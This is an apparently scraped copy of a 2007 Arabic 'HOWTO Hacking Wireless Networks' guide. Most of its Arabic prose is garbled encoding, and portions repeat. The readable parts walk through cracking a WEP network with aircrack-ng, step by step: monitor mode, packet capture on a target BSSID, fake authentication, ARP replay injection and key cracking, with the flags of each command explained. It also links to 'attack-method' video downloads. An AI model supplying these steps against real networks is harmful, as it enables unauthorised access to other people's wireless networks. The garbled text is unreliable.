aircrack-ng –b 00:14:7F:1F:27:6D capture.cap

capture.cap : capture files
25
و‬
The attack method 2!a‫א‬ij/‫(א‬k
iqqj/‫=אא‬qq<z6qq("qq*(Jqq5S‫א‬zqq1cqq@qq*(F5)qqW($)q*1iqqj/‫=אא‬qq<i)Yqq!

Fake authentication

W8‫א‬u6*‫א‬NFZij/‫<=אא‬4@"Tesp6
‫א‬u:i")q&q&(cqe‫א‬#‫"א‬q*(Jq5S‫א‬z1c@*(F5|M)W($4D‫@*[א‬4a

K*(J5S‫א‬z1c@*(F50e

qqEK(Uqqz6qq(Fcqq@qq*(F50qqeqq!Mqq*(Jqq5S‫<א‬qq!v‫א‬iqqj/‫=אא‬qq<i)Yqq!4qq‫א‬
)<DqE"arp replay 4!86<‫א‬.V‫א‬1*(J5S‫א‬9:arp request 4E!
K8Z4DR(R.‫[א‬5‫א‬

26
و‬
airmon-ng – switch to monitor mode

airodump-ng – capture packets
aireplay-ng – attack modes fake authentication
aireplay-ng – attack modes arpreplay
aircrack-ng – crack WEP , WPA
(١) airodump-ng
K[V\"5‫!א‬v‫א‬U‫({<=|א‬k1
airodump-ng –c 6 –-bssid 00:14:6C:1A:98:8C –w output ath0
-c : channel number
--bssid : MAC Address for Access Point
-w : save the file
output : file name that be save the packet
27
و‬
(٢) aireplay-ng fake authentication

K0FZ' ‫א‬4E!"c@*(F50e!M06<!"*(J5S‫א‬9:'k4E!
aireplay-ng --fakeauth 6000 –o 1 –q 10 –e DataCenter –a

00:14:6C:1A:98:8C -h 00-0F-B5-EA-2F-AF ath0
--fakeauth : attack modes

-o 1 : Send only one set of packets at time
-q 10 : Send keep alive packets every 10 seconds
-e : Name of Access Point
-a : MAC Address for Access Point
-h : our MAC Address Card
28
و‬
(3) aireplay-ng arpreplay

K*(J5S‫א‬9:*±m‫}א‬R‫א‬-‫א‬,)Yarp request 4E!È
aireplay-ng --arpreplay –b 00:14:6C:1A:98:8C -h 00-0F-B5-EA-2F-AF ath0
--arpreplay : attack modes

-h : our MAC Address Card
ath0 : our interface card
29
و‬
(3) increase the packets

`qqEE٣FqqTq m‫{א‬qq )qq&"_‫)א‬qqWqqqq!5qq5‫א‬E١FqqTqq m‫*[א‬qq@qq4qqa
K8ZR(R.‫[א‬5‫<)א‬D
30
و‬
(4) aircrack-ng
OD‫א‬i!ÈU‫({<=|א‬k1
aircrack-ng –b 00:14:6C:1A:98:8C output.cap

output.cap : capture files
( 5[)Y-‫א‬,( ‫א‬v@*V!‫)א‬r!‫"<=א‬

XE‫א‬ ±7m‫=אא‬VEM"M'‫א‬E‫|א‬S"J(‫@'אא‬
K+‫א‬N"M[RW-‫א‬8!"#$‫()|א‬1
31
و‬
lm‫א‬
)qqW(4qq،qqEF‫'א‬Dqq‫אא‬#qqZ‫[א‬qq ‫א‬8qqV*qq""*qqERqq(V!9:8!‫א‬qqZ:*qq%"

K&‫&"<=אא)}(&! [<=אא‬D"_‫)א‬W4(kLp-eTOa5eM"k

X(qq {qq 0qqe()qqe,qq)qqW(()qq4qq54Dqq})qq‫=אא‬qq<vDqqqq6)qq
W‫<=א"א‬z1<)oV@X‫א‬ij/‫א‬
Attack-method 1 ( 124 MB )
http://www.4shared.com/file/24526019/8831b5f1/attack-
method1part1.html?dirPwdVerified=630ebe35 50MB
http://www.4shared.com/file/24546586/40c72462/attack-
http://www.4shared.com/file/24548769/ada0b720/attack-
Attack-method 2 ( 113 MB )
http://www.4shared.com/file/24553904/65b4efa0/attack-
method2part1.html?dirPwdVerified=24884433 50MB
http://www.4shared.com/file/24590482/9b931121/attack-
http://www.4shared.com/file/24592271/2b86e86d/attack-
`‫א‬#qq$‫_[א‬Fq &eqq‫א‬u‫"א‬4qq-‫א‬0qq!SKK qqt‫אא‬J*qqiqq\*0qqW‫א‬8!‫א‬qqZ:4qq5qqzqq*lM

KJ*qq 0Wc1

{qq *-‫=אא‬qq<qq""
‫א‬Dqq($}qq*‫א‬Dqq($qq"qqE"0qq1
‫א‬zqq%(qq‫*א‬qqENqq(
‫=א‬q<`Fq0667qzq1q ‫א‬8q~‫א‬8ZS;1)‫"א‬D9&
‫&)@א‬0WM8!e(‫א‬
xqqZM}"R[
ruqq5‫א‬qq!"،vqqj*‫{"א‬qqe‫א‬i‫"א‬R0qqzqq*lM qqt‫אא‬4Dqq0qqW‫א‬Z:"+qq‫א‬
KKKKK
‫" א‬1iF‫"א‬
32
و‬
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

‫)א‬6+‫א‬

:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
q<١٤٢٨Lr١٢

( Sptember 23, 2007 )
-------------------------------
8!"#$‫א‬+‫א‬67
----------------------------------------------------------------
aLT3rEQ$Hacker
------------------------------------------------------------------
33

HOWTO-Hacking Wireless Networks اختراق الشبكات اللاسلكية ,, الوايرلس

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

HOWTO-Hacking Wireless Networks اختراق الشبكات اللاسلكية ,, الوايرلس

Uploaded by

Copyright:

Available Formats

http://www.t0010.

com ‫ ا رق ا

© Copyright #₪₩~ BrokeN-ProXy #₪₩~ 2007

q6‫א‬Fqq<"q&‫א‬5qS zq")((r|M[4*‫א‬dYD‫א‬r rw‫א‬ s%M

WLAN \wireless local FqEF‫א‬q‫'א‬q qDq‫א‬8q<"T)()‫א*א‬4 ‫=א‬q q<4q q5"

8qEF‫*א א‬i‫)א‬YE‫א‬VedYD‫(  א‬X‫א‬5S‫א‬1T18Ve*Z ‫א*א‬M

Ewireless computer cardsFEF‫א‬6‫ 'א‬J١

q ‫=א‬q<|qA"0 ep r)"MZ.VW|M"MN6‫א‬.V TRWr)"

WEaccess pointFN%‫ ! א‬J٢

*ZqE!z1|AX‫א'א‬t  * MK!#!$‫א‬D EF‫'אא‬D‫א‬47

+‫<=אא‬8qeV(  5(kvD i!`E"

rqqe،q /Dqq!$‫ א‬qqE‫"א‬qq‫א‬qq1R"،q Ve‫א‬qq)qq5‫"א‬،qqEF‫' א‬qq*‫א‬KqqqqY

Institute of Electrical and Electronics Engineers (IEEE)

Internet Engineering Task Force (IETF)

Wireless Ethernet Compatibility Alliance (WECA)

International Telecommunication Union (ITU)

4q!q5Kq(& IEEE 4q6&‫'א‬q16iqF

q *‫א‬q1"،q ‫א‬T‫א‬Rq qV IEEE 4a' Enre ،EF‫'א‬D‫א‬J(( ;*M

Xq‫'א‬e q-‫א‬9:_‫א‬R*qE‫א‬q¡L‫א‬q!M6qpqEF‫' א‬Dq‫א‬K*7q ، ‫'א‬D‫א‬4a

"MT)q&‫א‬q&‫'א‬Dq‫ א‬q1qE$'$7q‫א‬JqEq,)Y q-‫ א‬WWAN 'q*q¢l

Global 8!qa‫א‬4q‫א‬q6\!M6qE2GF8!a‫א‬4‫א‬6\! ‫ א‬WWAN '*`&£

TR")qN¤qoq!:Vq& cq Xq‫"א‬،8!qa‫א‬4‫ א‬N7‫@'א‬N!FRV‫א‬e

W Wireless metropolitan area networks ( WMAN

q *6qpTR)q& q‫א‬,q qE$'$7q‫א‬JqEq,)Y q-‫ א‬WMAN 'q*q¢l

[cqu"، q‫א‬N7q$‫'א‬Dq1)q54q6& rM WMAN 'Dqq ،cqu9:eqp

zq1q ‫א‬R‫א‬RUq("'q!‫ א‬4q*;‫א‬q6‫א‬qA&@S‫"א‬M((R‫אאא‬S‫ א‬WMAN '@i)Y 

multichannel multipoint distribution service 4qa،q¡'q*i‫)א‬YqE‫א‬q

4qEzq1Fqq * 6qpqE$'$7q‫א‬JqEq,)Y q-‫ א‬WLAN 'q*ql

q5q5rq2qxqZM5qM["Mqn-‫א‬q-‫ [א‬WLAN 'q@i‫)א‬YqE‫ א‬q

4q6&‫'א‬q 47qqEES‫ א‬WLAN 'q@[K,(q 4q6&rM WLAN 'Dqq

r"R qqnN7qq‫א‬qq@‫א‬Dqq(rM،'‫א‬lnqqqq14qqa،TR")qqqq *[,)Y qqT)qq&qq

'q!‫א‬4q!1qER)q§|=‫"א‬،WLAN 'D٨٠٢{١١}z1 IEEE R%، 1997i1[

zq1q!a q q~ ٥٤<)qx7q1 '!‫א‬4!R)§|=‫א‬،٨٠٢{١١a<Z)()W}

WWireless personal area networks ( WPAN

، PDA4qqaFTUqqVWqqe5qqE$'$7qq‫א‬JqqE qq,)Y qq-‫ א‬WPAN 'qq*qql

8q< Bluetooth q*K;‫א‬q6‫א‬qA&@S‫ "א‬Bluetooth 8<EES‫ א‬WPAN '* _ 

q Bluetooth q*(q q("qt‫"א‬+q‫"א‬r‫)א‬q‫א‬q1 Bluetooth 'q! 4!

iq WPAN 'Dq٨٠٢{١٥4q6&‫א‬q16 IEEE  qEM، WPAN'q*(q )q

WWired Equivalent PrivacyN5 J١

8q<"RC4L!bit٢٤ODT<IVq‫א‬IV[Initialization Vector ][RWT~a‫א‬

qqE5qq<"$:{tqqR١٠=qqZ(q ‫א‬qq‫א‬rMqqW)qq‫ א‬qq ٢٤cqq!rM  qq!cqqu)qq&

q ٢٤q<"IVq<8!qa‫א‬Uq‫"א‬RC4Lq! ١٠٤ODN"S‫;א‬U‫א‬,tUW0! ١٢٨q‫א‬

WWi-Fi Protected AccessN5 J٢

WPA with PSK [pre shared key]

aircrack-ng {e‫ א‬8E$'5 5N6.VW

ct‫א‬q@)q*1=qq5c=qAircrack ]q! zq146&qEJ(‫'"א‬545Je0!‫א‬

The best chipset nowadays is Atheros. It is very well supported under

qq‫א‬Lqq!46Dq("[]qq!‫ א‬qqquZqN")qq‫]]א‬q!‫ א‬qqqe‫א‬-‫"'א‬qq‫א‬,q(N")qqW‫=א‬q<

8q‫"א‬qV5(q 0&(. ±m‫א‬iU‫")(א‬V58‫(&א‬.‫ א‬z1dY@45_ &k

sudo apt-get install build-essential

‫_א‬Oa5V*) !`E"_‫)א‬Wwireless tools 5

tar xvfz wireless_tools.28.tar.gz

q V*TOaqq5qq‫"א‬M{qq T‫א‬RS‫=א‬qq<qq1  qqcqq!M2qqJ(‫א‬qq‫א‬Uqqqq5# qq*6‫=א‬qq<"

4q4qvq@|=q‫א‬wireless tools   q‫א‬q5rMqFiwlist qS‫א‬i)Y q!`qE

bt ~ # iwlist ath0 scan

[ Monitor Mode ]R-‫א‬9:'‫א‬4(A

Monitor Modeq'‫א‬4(3,( ‫א‬vD iM`Erw‫א‬

bt ~ # ifconfig ath0 down

Bit Rate:0 kb/s Tx-Power:31 dBm Sensitivity=0/3

wifi0 Atheros madwifi-ng

bt ~ # airmon-ng start wifi0

Interface Chipset Driver

wifi0 Atheros madwifi-ng

The attack method 19"S‫א‬ij/‫(א‬k

com ‫ ا رق ا

q6‫א‬Fqq<"q&‫א‬5qSzq")((r|M[4*‫א‬dYD‫א‬rrw‫א‬ s%M

WLAN \wireless local FqEF‫א‬q‫'א‬q qDq‫א‬8q<"T)()‫א*א‬4‫=א‬q q<4q q5"

8qEF‫אא‬i‫)א‬YE‫א‬VedYD‫( א‬X‫א‬5S‫א‬1T18VeZ‫א*א‬M

Ewireless computer cardsFEF‫א‬6‫ 'א‬J١

q ‫=א‬q<|qA"0epr)"MZ.VW|M"MN6‫א‬.VTRWr)"

WEaccess pointFN%‫ ! א‬J٢

ZqE!z1|AX‫א'א‬t MK!#!$‫א‬DEF‫'אא‬D‫א‬47

+‫<=אא‬8qeV( 5(kvDi!`E"

rqqe،q /Dqq!$‫ א‬qqE‫"א‬qq‫א‬qq1R"،q Ve‫א‬qq)qq5‫"א‬،qqEF‫' א‬qq*‫א‬KqqqqY

4q!q5Kq(& IEEE 4q6&‫'א‬q16iqF

q ‫א‬q1"،q ‫א‬T‫א‬RqqV IEEE 4a'Enre ،EF‫'א‬D‫א‬J(( ;M

Xq‫'א‬eq-‫א‬9:_‫א‬RqE‫א‬q¡L‫א‬q!M6qpqEF‫' א‬Dq‫א‬K7q ،‫'א‬D‫א‬4a

"MT)q&‫א‬q&‫'א‬Dq‫ א‬q1qE$'$7q‫א‬JqEq,)Yq-‫ א‬WWAN 'q*q¢l

Global 8!qa‫א‬4q‫א‬q6\!M6qE2GF8!a‫א‬4‫א‬6\!‫ א‬WWAN '*`&£

TR")qN¤qoq!:Vq&cq Xq‫"א‬،8!qa‫א‬4‫ א‬N7‫@'א‬N!FRV‫א‬e

q 6qpTR)q& q‫א‬,q qE$'$7q‫א‬JqEq,)Yq-‫ א‬WMAN 'qq¢l

[cqu"،q‫א‬N7q$‫'א‬Dq1)q54q6& rM WMAN 'Dqq ،cqu9:eqp

zq1q ‫א‬R‫א‬RUq("'q!‫ א‬4q*;‫א‬q6‫א‬qA&@S‫"א‬M((R‫אאא‬S‫ א‬WMAN '@i)Y

multichannel multipoint distribution service 4qa،q¡'q*i‫)א‬YqE‫א‬q

4qEzq1Fqq 6qpqE$'$7q‫א‬JqEq,)Yq-‫ א‬WLAN 'qql

q5q5rq2qxqZM5qM["Mqn-‫א‬q-‫ [א‬WLAN 'q@i‫)א‬YqE‫ א‬q

4q6&‫'א‬q 47qqEES‫ א‬WLAN 'q@[K,(q 4q6&rM WLAN 'Dqq

r"R qqnN7qq‫א‬qq@‫א‬Dqq(rM،'‫א‬lnqqqq14qqa،TR")qqqq *[,)YqqT)qq&qq

'q!‫א‬4q!1qER)q§|=‫"א‬،WLAN 'D٨٠٢{١١}z1 IEEE R%، 1997i1[

zq1q!aqq~ ٥٤<)qx7q1'!‫א‬4!R)§|=‫א‬،٨٠٢{١١a<Z)()W}

، PDA4qqaFTUqqVWqqe5qqE$'$7qq‫א‬JqqE qq,)Yqq-‫ א‬WPAN 'qq*qql

8q< Bluetooth qK;‫א‬q6‫א‬qA&@S‫ "א‬Bluetooth 8<EES‫ א‬WPAN ' _

q Bluetooth q*(q q("qt‫"א‬+q‫"א‬r‫)א‬q‫א‬q1 Bluetooth 'q!4!

iq WPAN 'Dq٨٠٢{١٥4q6&‫א‬q16 IEEE qEM، WPAN'q*(q )q

WWired Equivalent PrivacyN5 J١

8q<"RC4L!bit٢٤ODT<IVq‫א‬IV[Initialization Vector ][RWT~a‫א‬

qqE5qq<"$:{tqqR١٠=qqZ(q ‫א‬qq‫א‬rMqqW)qq‫א‬qq٢٤cqq!rM qq!cqqu)qq&

q٢٤q<"IVq<8!qa‫א‬Uq‫"א‬RC4Lq!١٠٤ODN"S‫;א‬U‫א‬,tUW0!١٢٨q‫א‬

WWi-Fi Protected AccessN5 J٢

aircrack-ng {e‫ א‬8E$'5 5N6.VW

ct‫א‬q@)q*1=qq5c=qAircrack ]q!zq146&qEJ(‫'"א‬545Je0!‫א‬

qq‫א‬Lqq!46Dq("[]qq!‫ א‬qqquZqN")qq‫]]א‬q!‫ א‬qqqe‫א‬-‫"'א‬qq‫א‬,q(N")qqW‫=א‬q<

8q‫"א‬qV5(q 0&(.±m‫א‬iU‫")(א‬V58‫(&א‬.‫א‬z1dY@45_ &k

‫_א‬Oa5V*)!`E"_‫)א‬Wwireless tools 5

q VTOaqq5qq‫"א‬M{qq T‫א‬RS‫=א‬qq<qq1 qqcqq!M2qqJ(‫א‬qq‫א‬Uqqqq5#qq6‫=א‬qq<"

4q4qvq@|=q‫א‬wireless tools q‫א‬q5rMqFiwlist qS‫א‬i)Yq!`qE

[ Monitor Mode ]R-‫א‬9:'‫א‬4(A

Monitor Modeq'‫א‬4(3,( ‫א‬vDiM`Erw‫א‬

The attack method 19"S‫א‬ij/‫(א‬k

0qqe"qq(Jqq5S‫א‬zqq1cqq@+qq+$.qqVW)qqW(KKFqq1M83qqp‫א‬4Dqq‫[א‬qq@qq4qqa

interactivez6(ij<i)Y*E"'!‫א‬i!`EU‫({<=|א‬q q qk1

The attack method 2!a‫א‬ij/‫(א‬k

iqqj/‫=אא‬qq<z6qq("qq(Jqq5S‫א‬zqq1cqq@qq(F5)qqW($)q*1iqqj/‫=אא‬qq<i)Yqq!

‫א‬u:i")q&q&(cqe‫א‬#‫"א‬q(Jq5S‫א‬z1c@(F5|M)W($4D‫@*[א‬4a

( 5[)Y-‫א‬,( ‫א‬v@*V!‫)א‬r!‫"<=א‬

)qqW(4qq،qqEF‫'א‬Dqq‫אא‬#qqZ‫[א‬qq ‫א‬8qqVqq""qqERqq(V!9:8!‫א‬qqZ:*qq%"

`‫א‬#qq$‫_[א‬Fq &eqq‫א‬u‫"א‬4qq-‫א‬0qq!SKK qqt‫אא‬Jqqiqq\0qqW‫א‬8!‫א‬qqZ:4qq5qqzqq*lM